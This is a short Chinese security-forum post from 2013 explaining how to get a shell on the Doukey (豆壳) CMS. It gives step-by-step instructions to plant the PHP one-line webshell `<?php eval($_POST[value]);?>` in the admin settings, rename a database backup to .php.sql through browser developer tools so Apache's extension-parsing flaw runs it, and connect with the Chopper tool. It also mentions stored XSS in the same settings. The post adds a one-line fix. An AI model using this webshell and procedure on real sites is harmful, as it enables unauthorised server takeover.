【我爱T00LS】豆壳系统的xss及后台利用解析漏洞getshell

2013-09-03 16:23:53 15 2824


在豆壳系统中存在解析漏洞和XSS;改系统感觉很不错,代码简单,简洁。

当我们进入后台可以直接备份出一句话木马:

1.我们先在系统设置中填写一句话木马:


2.然后在数据库备份中备份


查看源码(这里只看到input 但是编辑不了,输入框不给予编辑,所以我们利用chrome自带的代码编辑器,按下F12调出,查看源码看到input的VALUE值)

3.

直接双击那个value值修改数据库备份名字,加上后缀.php 因为apache存在解析的漏洞,可以直接把文件解析成.php


直接备份



4.然后浏览器直接访问数据库文件:data/backup/数据库名称.php.sql

解析成功

所以我们修改系统设置中加入一句话木马   <?php eval($_POST[value]);?>
菜刀链接备份文件http://url/data/backup/数据库名称.php.sql


XSS:
一样的我们直接在后台中系统设置中插入xss语句就会出现XSS漏洞

有了XSS 大家都懂的。

解决方法:
后台将输入进行转义,和程序随机生成备份。(一切输入都有害。),

小弟无才.木有技术含量..脚下留情..

关于作者

评论15次

要评论?请先  登录  或  注册